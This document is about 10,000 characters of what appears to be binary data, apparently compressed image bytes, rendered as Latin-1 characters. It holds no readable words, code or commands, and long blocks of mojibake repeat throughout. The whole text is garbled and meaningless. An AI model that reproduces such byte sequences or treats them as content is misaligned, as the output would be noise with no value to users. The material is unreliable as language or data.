          þ_ìõïú§ãOüþÎóÿ’¶ÿbýþ»[Ÿý`ÿzóõï ÿ†ÿ/öz÷ýÓñ§þgyÿÉ[ÿ±~ÿ]­Ïþ0½?ùú÷Ð×û={þéøÓÿ?³¼ÿ䭃ÿ؇¿®ÖçÿF˜?ޟüý{è?á¿Ëýž½ÿ@ôüiÿŸÙÞòVÁÿìCß¿×ksÿ£LïOþ~½ôðßåþÏ^ÿ z~4ÿÏìï?ù+`ÿö!ïßëµ¹ÿѦ÷§ÿ?^úøoòÿg¯Ð=?çöwŸü•°û÷ïõÚÜÿèÓûÓÿŸ¯}ü7ù³×¿èŸ?óû;ÏþJØ?ýˆ{÷úínôiƒýéÿÏ×¾ƒþü¿ÙëßôOƟùýçÿ%lþÄ=ûýv·?ú4ÁþôÿçëßAÿ
          þ_ìõïú§ãOüþÎóÿ’¶ÿbýþ»[Ÿý`ÿzóõï ÿ†ÿ/öz÷ýÓñ§þgyÿÉ[ÿ±~ÿ]­Ïþ0½?ùú÷Ð×û={þéøÓÿ?³¼ÿ䭃ÿ؇¿®ÖçÿF˜?ޟüý{è?á¿Ëýž½ÿ@ôüiÿŸÙÞòVÁÿìCß¿×ksÿ£LïOþ~½ôðßåþÏ^ÿ z~4ÿÏìï?ù+`ÿö!ïßëµ¹ÿѦ÷§ÿ?^úøoòÿg¯Ð=?çöwŸü•°û÷ïõÚÜÿèÓûÓÿŸ¯}ü7ù³×¿èŸ?óû;ÏþJØ?ýˆ{÷úínôiƒýéÿÏ×¾ƒþü¿ÙëßôOƟùýçÿ%lþÄ=ûýv·?ú4ÁþôÿçëßAÿ
          þ_ìõïú§ãOüþÎóÿ’¶ÿbýþ»[Ÿý`ÿzóõï ÿ†ÿ/öz÷ýÓñ§þgyÿÉ[ÿ±~ÿ]­Ïþ0½?ùú÷Ð×û={þéøÓÿ?³¼ÿ䭃ÿ؇¿®ÖçÿF˜?ޟüý{è?á¿Ëýž½ÿ@ôüiÿŸÙÞòVÁÿìCß¿×ksÿ£LïOþ~½ôðßåþÏ^ÿ z~4ÿÏìï?ù+`ÿö!ïßëµ¹ÿѦ÷§ÿ?^úøoòÿg¯Ð=?çöwŸü•°û÷ïõÚÜÿèÓûÓÿŸ¯}ü7ù³×¿èŸ?óû;ÏþJØ?ýˆ{÷úínôiƒýéÿÏ×¾ƒþü¿ÙëßôOƟùýçÿ%lþÄ=ûýv·?ú4ÁþôÿçëßAÿ
          þ_ìõïú§ãOüþÎóÿ’¶ÿbýþ»[Ÿý`ÿzóõï ÿ†ÿ/öz÷ýÓñ§þgyÿÉ[ÿ±~ÿ]­Ïþ0½?ùú÷Ð×û={þéøÓÿ?³¼ÿ䭃ÿ؇¿®ÖçÿF˜?ޟüý{è?á¿Ëýž¦ãá>ÿñ™~I;Ÿ»j[K\T6Å0LԓÇ:Å8‹jE)†C›K+i&Ä}é½ÙÜØûªâ~½û¾¿èßËýž¬Ïý”|/üöyOüõRõ_²_ëåÇý“ýèÿ›¤ß¹“ýþgû={ý”|/üöyOüõRõ_¿_.?èܟïGüÝ{÷2¿Ïìÿg¯²…ÿžÏ)ÿžªOþ«÷ïëåÇý“ýèÿ›¯~æO÷ùýŸìõïöQð¿óÙå?óÕIÿÕ~ýý|¸ÿ£r½óuïÜÉþÿ?³ýž½þÊ>þ{<§þz©?ú¯ß¿¯—ônO÷£þn½û™?ßçö³×¿ÙGÂÿÏg”ÿÏU'ÿUû÷õòãþÉþôÍ׿s'ûüþÏöz÷û(ø_ùìòŸùê¤ÿê¿~þ¾\ѹ?ޏùº÷îdÿŸÙþÏ^ÿeÿ=žSÿ=TŸýWïß×ˏú7'ûÑÿ7^ý̟ïóû?Ùëßì£áç³Ê窓ÿªýûúùqÿFäÿz?æëß¹“ýþgû={ý”|/üöyOüõRõ_¿_.?èܟïGüÝ{÷2¿Ïìÿg¯²…ÿžÏ)ÿžªOþ«÷ïëåÇý“ýèÿ›¯~æO÷ùýŸìõïöQð¿óÙå?óÕIÿÕ~ýý|¸ÿ£r½óuïÜÉþÿ?³ýž½þÊ>þ{<§þz©?ú¯ß¿¯—ônO÷£þn½û™?ßçö³ÕFÿ0ÎòÙ_^^£ê½ã>êî*Ø?ßÇW5ãºÛU
          ¼?w,rÔ-FPôôŸò‰ÍmPÇ,­ÈV{2'ï]ÊÅaÚAìÉÕ1hAæßˆö¯™	g²†
          %,Þbkñ[QQYQ=]\óUUUO-EMMD¯=EEDîòÍ<óJÍ$ÓM#fbY˜’MýÍ PªQÀu±åötÛ'Ôÿ­ÿ_Ó¨r}ØÅ}Ðð=_¨/ÿ÷¦êã‰êŸŸõÿâ¾èzºñ꟟õýÓ«¯¡?üGºzuuêý?Ûû©êãêý=ÐõqçÔ9>þÃþ#Ýz¸áÔ9??ë{¡ãùõqèOôï¿§ºtààz‚ÿAþ¿ºõo>º£ÈWâk¨ò˜ºÚ¬vOWv?!CQ--m
          m,É=-]%T“SÔÓ̊èèÁ•€ ‚=¶à0*ªFGW 0Š‚:Ù»ùeü¨ëÿ•¿kÒÝǽ_fwÝvåCÑЦ¶1Ԑe—#KM
          õ¢‚&z¼xj£SQKuCOó’î<¾¿¼,lVm³ñdꌟQš¡òo#†ò$ž]š"ÅÒBª|©ZuuŸì£áç³Ê窓ÿªýÇ?×ˏú7'ûÑÿ7LþæO÷ùýŸìõïöQð¿óÙå?óÕIÿÕ~ýý|¸ÿ£r½óuïÜÉþÿ?³ýž½þÊ>þ{<§þz©?ú¯ß¿¯—ônO÷£þn½û™?ßçö³×¿ÙGÂÿÏg”ÿÏU'ÿUû÷õòãþÉþôÍ׿s'ûüþÏöz÷û(ø_ùìòŸùê¤ÿê¿~þ¾\ѹ?ޏùº÷îdÿŸÙþÏ^ÿeÿ=žSÿ=TŸýWïß×ˏú7'ûÑÿ7^ý̟ïóû?Ùëßì£áç³Ê窓ÿªýûúùqÿFäÿz?æëß¹“ýþgû={ý”|/üöyOüõRõ_¿_.?èܟïGüÝ{÷2¿Ïìÿg¯²…ÿžÏ)ÿžªOþ«÷ïëåÇý“ýèÿ›¯~æO÷ùýŸìõïöQð¿óÙå?óÕIÿÕ~ýý|¸ÿ£r½óuïÜÉþÿ?³ýž½þÊ>þ{<§þz©?ú¯ß¿¯—ônO÷£þn½û™?ßçö³×¿ÙGÂÿÏg”ÿÏU'ÿUû÷õòãþÉþôÍ׿s'ûüþÏöz÷û(ø_ùìòŸùê¤ÿê¿~þ¾\ѹ?ޏùº÷îdÿŸÙþÏ^ÿeÿ=žSÿ=TŸýWïß×ˏú7'ûÑÿ7^ý̟ïóû?Ùëßì£áç³Ê窓ÿªýûúùqÿFäÿz?æëß¹“ýþgû={ý”|/üöyOüõRõ_¿_.?èܟïGüÝ{÷2¿Ïìÿg¯²…ÿžÏ)ÿžªOþ«÷ïëåÇý“ýèÿ›¯~æO÷ùýŸìõïöQð¿óÙå?óÕIÿÕ~ýý|¸ÿ£r½óuïÜÉþÿ?³ýž½þÊ>þ{<§þz©?ú¯ß¿¯—ônO÷£þn½û™?ßçö³×¿ÙGÂÿÏg”ÿÏU'ÿUû÷õòãþÉþôÍ׿s'ûüþÏöz÷û(ø_ùìòŸùê¤ÿê¿~þ¾\ѹ?ޏùº÷îdÿŸÙþÏHýÿñ»³v~ssAº+ë¥ÄSE:RKާ†9Œ•TôåZD¨v@×à§µûW7ϸnÖMdв*š`ŸO—LÜí‰J%$¯ËçÑKö;蟯{÷^ëÞý׺÷¿uî¿ÿÒÙ_ÞDtëÞý׺÷¿uî½ïÝ{£‰ñþ.;ãþ °_õ¿)î?çÏìvßôÏþèëfø®>Áþ^Žï¸ß£î½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢üÄ~^'Ä·oOLݯØ2Ví¾¸¥™c˜c¦ŽÛ7¼j)¥
          ô›Z–ª6]$®¨¦GV‰¤°÷ÛÞQ<×½¸SûªÜ˜úç¶0|‹k衈5§Inçð#ÇÆxŸòëM¼ÆS%œÉä3YšúÌ®_/]W“Êå252ÖWär5Ó½Umum\ï$õ5uu2´’HìY݉$“ï0#Š8#HaŒ$(ª@€ÀI$œôÇ'üOüWÞú°â>ΡÉõ?ëÄ{oÓ«úuO¯ûø¯º«õÿâ¾ôÝ\q=B“óþ¿üWÝW^=C“óþ¿ºuuãÔ'ÿˆ÷ON®½B§ûu=\p=A§º®<ú‡'Ñ¿ØÄ{¯W:‡'çýot<>®8u	þƒý÷ô÷NœP_è?×÷^­çÔ9??ï¿>èzsøzï”Éàòt¬.F»˜ÄVÒäñY\e\ô,fJ‚hê¨rúêY"©£­£©‰dŠXÙ^7PÊAûjDIQã‘F„PAÁGÕÿ‡­Ã?•_ó]Æ|“¡Ãtȵ'ä:Rm}ÓSöô¾ã¢¢†à¾*j秌µM"*őUié€o,ãÇ=r#ìÏ.ë´Æ[i&¬¼L$ÿ†:ð<Wò%·Jdpêõ}Æ7×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷A?y̨Þö¯¦ÿݕ³ÞZÿ’îÝþœÿÇOH÷÷°„uVÞæ¾‚}{ߺ÷^÷î½×½û¯uÿÓÙ_ÞDtëÞý׺÷¿uî½ïÝ{£‰ñþ.;ãþ °_õ¿)î?çÏìvßôÏþèëfø®>Áþ^Žï¸ß£î½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{­=šwuÕvÿË­õ‹†±æÛ=HÉÕû~›WíCY€wmáPbSãû©÷|õ‘4Ÿ©à§…Xú}í~ʛG(ØÊÉK›¿×sòìÇØ#
          iê[×¢Ù<IÈò\Ÿùõ[R~?ØÿÄ{ŸIú…'üOüWÝz¸â>Κe®¢ZŸ´jÊUª`4Óˆ…A¸¸´%ü†ãü=·QŒõ1×>¿ì?â¾èx¯ÔÿŠûÓuqÄõ
          OÏúÿñ_t=]xõOÏúþéÕ׏PŸþ#Ý=:ºõ	þŸíýÔõqÀõþžèz¸óêŸFÿaÿî½\p꟟õ½Ðñüú¸áÔ'ú÷ßÓÝ:pp=A ÿ_Ýz·ŸPäüÿ¾üû¡éÏá꟟õ¿â=Ðõáëª:úìUuS[WÉãjé«ñÙ
          ™¨ë¨+¨æJŠJÚ*ºwŽ¢–®–¢5’9#etu¤¶ÝEtuŒ(AÈ ñyƒÕ¼ÿ.·þTŸÍ–ƒä-.ã¿È¼Í/½¨ibÇì½í],4xþ⦦MÐÖ1SÑv40 Õ´yp‘ŸTMœóÈ­´´»¶Ñm°šº˜¾cÖ?øïŒôԉLŽ_o¸»¦º÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{ Ÿ¼¿æTo?ûWÓîʇÙï-ÉwnÿN㧤{‡û‡?Ø?Â:«os_A>½ïÝ{¯{÷^ëÞý׺ÿÔÙ_ÞDtëÞý׺÷¿uî½ïÝ{£‰ñþ.;ãþ °_õ¿)î?çÏìvßôÏþèëfø®>Áþ^Žï¸ß£î½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{­÷Îà¨Ý›ÓwnšÇij÷.çÏn
          ©Y̍%Fg+U‘Ùۗg–¤’O'Þ|ÙÛ­¥•¥ª
          $Q"±Tþ‚îuÞ¤ôŒ“ñþÇþ#ÛçÏ«tE¾MwNg–~½ÚuÓcžš·&RŽCsIYÔSâ©j‰)cZIRYwò*ª:)å èSöõ³åötEÚIF•ÝÞVs#HÌÍ#9:‹³’X¹noõ¿´k£wñã¹sK¢Ø›Ÿ!>O”
          Oƒ­®•§«Æ×¤m$4-S!i¦¡«T1ƬXÇ&€¶R@z9Âxtâ6hz<oÿö¡ºP8ž¡Iùÿ_þ+¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVóë=]^>®š¾‚ª¢ŠºŠ¦º*ÚI¤¦«¤«¦•f§ª¥¨…’jzŠy::ÈÀAÚeWYASPAàG¡êþcìëoå=üÛhûÚÆï’Ùê\uÓEO‹ëîÁÈÉ-mÃk>7;•‚—²TÜé4?Hžšˆžy¶Ã&ï³ÄNÜj]L_1ëüsý/$Orðë`qgLõï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝýåÿ2£yÿÚ¾›ÿvT>ÏykþK»wúsÿ=#Ü?Ü9þÁþÕ[{šú	õï~ëÝ{ߺ÷^÷î½×ÿÕÙ_ÞDtëÞý׺÷¿uî½ïÝ{£‰ñþ.;ãþ °_õ¿)î?çÏìvßôÏþèëfø®>Áþ^Žï¸ß£î½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{­{mTl¾Àß;:²6†¯iï
          ˶ª¢d1´U,Ín.xÙ(É-)¥½ç½…ÊÞíöWˆj’ÂŽ>ÆPÃü=ib¾„ô‚“ñþÇþ#ړçÖú©‘8ªÜ_onß»G	’ž“+E+¦z*º*p?©!š)!?Ñ¢#ñì²pD­ÖÏ@—¶º×B7Qc+2ݙ²)¨‘ÚH7/%)@n“UJ¶F#ôªÒҿ׋ñù÷da՗âZÛÿÅ}¬n•'¨R~×ÿŠû¡êëǨr~×÷N®¼z„ÿñééÕרOôÿoî§«Ž¨/ô÷CÕǟPäú7ûøuêã‡Päüÿ­î‡çÕÇ¡?оþžéӃêýúþëÕ¼ú‡'çý÷çÝNP¤üÿ­ÿÿPä÷SçÕ¼ú‡'çý÷çÛgˆêþcìëU5u0ÕÒO5-],ÑTÓTÓJðTST@Ë,3Á4L²C42(ee!•€ ßÝºX§ˆêþ}mÙü¥ÿ›¥?sG·¾3|ŸÜ1Swk#­{7+4pRöœh¢*=³¹êœ¤TýŠŠ¡)ªɜ#_o½¹ç‘NÞeÞ6h«`s$cýՔ¾ýGàÿKð§–*U”c­ˆ½Å='ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è'ï/ù•ÏþÕôßû²¡ö{Ë_ò]ۿӟøééáþáÏöðŽªÛÜ×ÐO¯{÷^ëÞý׺÷¿uî¿ÿÖÙ_ÞDtëÞý׺÷¿uî½ïÝ{£‰ñþ.;ãþ °_õ¿)î?çÏìvßôÏþèëfø®>Áþ^Žï¸ß£î½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{­D?›GÕu/Ë
          ɺihީݱö©c"œç%Ðïj5•d­pDÕÒ(å!ÉC{ÞþòßڝíwnS·µg­Õ‘ð˜yé㧦ŽÑêPôE}‰‰güýUüŸö?ñä“çÒn®Ùê½Ú˜èbÈI&75Vrš$–ze”êzj¨£´.à1Œº2·(ËvÔ̑¬ƒ<zµ+O³¢}/ÄMú•†8÷Óz\U<ùxê<wúµÄȂR?²&+þÕí'Ó¿¨§^Òz3]UÒø.®†j˜ê1¸«¡Öff…`X©õ+µ:˜<¦–™¤@ÎK»ÊÊ	 Uu#¯Nª…ûz_þ+îÍÓ£‰êŸŸõÿâ¾èzºñ꟟õýÓ«¯¡?üGºzuuêý?Ûû©êãêý=ÐõqçÔ9>þÃþ#Ýz¸áÔ9??ë{¡ãùõqèOôï¿§ºtààz‚ÿAþ¿ºõo>¡Éùÿ}ù÷CӟÃÔ)??ëÄ{¡êÿÃÔ9=Ôùõo>¡Éùÿ}ùöÙâ:¿˜û:…'Ôÿ­ÿ\qê2M5<ñTSË$Á"Mð»E43Dáã–)«Ç$n «"ãÛnR¨=\yõ·òþoPöšm¯‹ß)·pv|iO…êîØÍU,pöBF
          
          £¼«§*‘v@#¢®‘´ç,"”Œ†–¯‚ùç‘M‘›yÙ¢ÿã$CýՐªþ#³áK44« Ç[û‰úM×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷A?y̨Þö¯¦ÿݕ³ÞZÿ’îÝþœÿÇOH÷÷°„uVÞæ¾‚}{ߺ÷^÷î½×½û¯uÿ×Ù_ÞDtëÞý׺÷¿uî½ïÝ{£‰ñþ.;ãþ °_õ¿)î?çÏìvßôÏþèëfø®>Áþ^Žï¸ß£î½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢Yó»ân;å¿Hä6…1£¡ì=±4ۗ¬³•vŽ*]Ã;EQ„¯¨U2E„ÜôƒíªºÅ(† «šuB3änk“”÷¨îÚ­·Ê4L£Í+†øäzKQ¨ž“ÜÀ'Œ¯ã?ÕóëLÛµ÷ÉÜy­£»põûsm̕^9„ÉÀÔÕøÜ•¦šZ˜[èñȼJ²Ù”• œÆ¶º·½·†îÒe’ÚE¬¦ ‚0GDD%XPŽ’’ÄÿÅ}»Õ‡öuO©ÿ[þ#Û~_Ó¨r}ØÅ}Ðð=_¨/ÿ÷¦êã‰êŸŸõÿâ¾èzºñ꟟õýÓ«¯¡?üGºzuuêý?Ûû©êãêý=ÐõqçÔ9>þÃþ#Ýz¸áÔ9??ë{¡ãùõqèOôï¿§ºtààz‚ÿAþ¿ºõo>¡Éùÿ}ù÷CӟÃÔ)??ëÄ{¡êÿÃÔ9=Ôùõo>¡Éùÿ}ùöÙâ:¿˜û:…'Ôÿ­ÿ\qêýß_to‡«>¢kxÝ$Ú9#pèèÅ]Hete!••…ÁƒîÀðêã‰ëm?åüàcì¶þ-|®ÜÑÿPR`z›·³•B8÷Ði±Û+}djBoki‹’‘€ÌqçïôI]óÇ"ý/¼ì°ÿ‹|RD?« þâ_ÃÄváRM*è1æ:ÙgÜKÒN½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è'ï/ù•ÏþÕôßû²¡ö{Ë_ò]ۿӟøééáþáÏöðŽªÛÜ×ÐO¯{÷^ëÞý׺÷¿uî¿ÿÐÙ_ÞDtëÞý׺÷¿uî½ïÝ{£{ñ2¦š›!½ÍMDáèðALòÇb'Ê\)‘–ä_ñìÏHïÛ¡	î~¾KÑÖÌ@ióä?ËÑÕþ+ŒÿþvSÿ×Ïqρ?ûåÿaèö£×¯ÆÎƃÿ;)ÿëç¿xÿ¾_ö½Që׿Šã?çcAÿ”ÿõóß¼	ÿß/û^¨õ뱔Æa‘¡$ð«§¹?õ3ß¼	¿ß-û^¨õë'ÞÑÊÝ/þtEÿGû¯‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô